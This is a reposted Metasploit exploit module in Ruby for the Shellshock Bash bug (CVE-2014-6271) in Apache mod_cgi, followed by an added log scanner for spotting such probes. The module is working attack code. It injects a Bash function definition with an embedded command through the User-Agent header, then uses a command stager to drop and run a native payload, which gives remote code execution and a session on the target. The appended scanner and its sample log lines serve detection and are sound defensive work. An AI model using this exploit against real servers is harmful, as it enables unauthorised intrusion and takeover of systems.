Apache mod_cgi Bash Environment Variable Code Injection Exploit
Source: metasploit.com  Author: wvu  Published: 2014-09-28
##
# This module requires Metasploit: http://metasploit.com/download
##
  
require 'msf/core'
  
class Metasploit4 < Msf::Exploit::Remote
  Rank = GoodRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Apache mod_cgi Bash Environment Variable Code Injection',
      'Description' => %q{
        This module exploits a code injection in specially crafted environment
        variables in Bash, specifically targeting Apache mod_cgi scripts through
        the HTTP_USER_AGENT variable.
      },
      'Author' => [
        'Stephane Chazelas', # Vulnerability discovery
        'wvu', # Original Metasploit aux module
        'juan vazquez' # Allow wvu's module to get native sessions
      ],
      'References' => [
        ['CVE', '2014-6271'],
        ['URL', 'https://access.redhat.com/articles/1200223'],
        ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
      ],
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 2048
        },
      'Targets'        =>
        [
          [ 'Linux x86',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86_64,
              'CmdStagerFlavor' => [ :echo, :printf ]
            }
          ]
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014',
      'License' => MSF_LICENSE
    ))
  
    register_options([
      OptString.new('TARGETURI', [true, 'Path to CGI script']),
      OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET', ['GET', 'POST']]),
      OptInt.new('CMD_MAX_LENGTH', [true, 'CMD max line length', 2048]),
      OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin']),
      OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
    ], self.class)
  end
  
  def check
    res = req("echo #{marker}")
  
    if res && res.body.include?(marker * 3)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end
  
  def exploit
    # Cannot use generic/shell_reverse_tcp inside an ELF
    # Check before proceeding
    if generate_payload_exe.blank?
      fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
    end
  
    execute_cmdstager(:linemax => datastore['CMD_MAX_LENGTH'], :nodelete => true)
  
    # A last chance after the cmdstager
    # Trying to make it generic
    unless session_created?
      req("#{stager_instance.instance_variable_get("@tempdir")}#{stager_instance.instance_variable_get("@var_elf")}")
    end
  end
  
  def execute_command(cmd, opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
  
    req(cmd)
  end
  
  def req(cmd)
    send_request_cgi(
      {
        'method' => datastore['METHOD'],
        'uri' => normalize_uri(target_uri.path.to_s),
        'agent' => "() { :;};echo #{marker}$(#{cmd})#{marker}"
      }, datastore['TIMEOUT'])
  end
  
  def marker
    @marker ||= rand_text_alphanumeric(rand(42) + 1)
  end
end
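
Added example, not part of the Metasploit module or the original page: a Ruby log scanner for defenders that flags Apache combined-format entries containing the Bash function-definition prefix "() {" that the module places in the User-Agent header. It goes beyond the module's single header by also checking the request line and Referer; the function names, the assumed combined log layout and the sample lines are constructed for illustration.

```ruby
# Added example (not from the module): find Shellshock-style probes in Apache logs.
# CVE-2014-6271 needs an environment variable whose value begins with a Bash
# function definition, "() {". Optional whitespace is tolerated between tokens.
SHELLSHOCK_PREFIX = /\(\s*\)\s*\{/

# Assumed layout (Apache "combined"):
# host ident user [time] "request" status bytes "referer" "user-agent"
# Quoted fields may contain backslash-escaped characters such as \".
COMBINED = /\A(\S+) \S+ \S+ \[([^\]]+)\] "((?:[^"\\]|\\.)*)" (\d{3}) \S+ "((?:[^"\\]|\\.)*)" "((?:[^"\\]|\\.)*)"/

# Returns a hash of the parsed fields, or nil for lines that do not parse.
def parse_line(line)
  m = COMBINED.match(line)
  return nil unless m
  { host: m[1], time: m[2], request: m[3], status: m[4].to_i,
    referer: m[5], agent: m[6] }
end

# Returns one hash per suspicious entry, with :fields naming where the prefix was seen.
def shellshock_hits(lines)
  lines.each_with_object([]) do |line, hits|
    entry = parse_line(line)
    next unless entry
    fields = %i[request referer agent].select { |f| entry[f] =~ SHELLSHOCK_PREFIX }
    hits << entry.merge(fields: fields) unless fields.empty?
  end
end

# Constructed sample lines (documentation IP ranges, made-up paths and markers).
SAMPLE_LOG = [
  '192.0.2.10 - - [28/Sep/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
  '198.51.100.7 - - [28/Sep/2014:10:00:05 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 87 "-" "() { :;};echo AbC$(true)AbC"',
  '198.51.100.7 - - [28/Sep/2014:10:00:09 +0000] "POST /cgi-bin/status.cgi HTTP/1.1" 500 0 "() { :; }; /bin/true" "curl/7.35.0"',
  'not a log line'
].freeze

if __FILE__ == $PROGRAM_NAME
  shellshock_hits(SAMPLE_LOG).each do |h|
    puts "#{h[:time]} #{h[:host]} \"#{h[:request]}\" -> #{h[:status]} fields=#{h[:fields].join(',')}"
  end
end
```

A hit records an attempt only; whether it executed depends on whether the Bash behind the CGI script is patched for CVE-2014-6271. Headers that the access log format does not record are not covered by this scan.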

 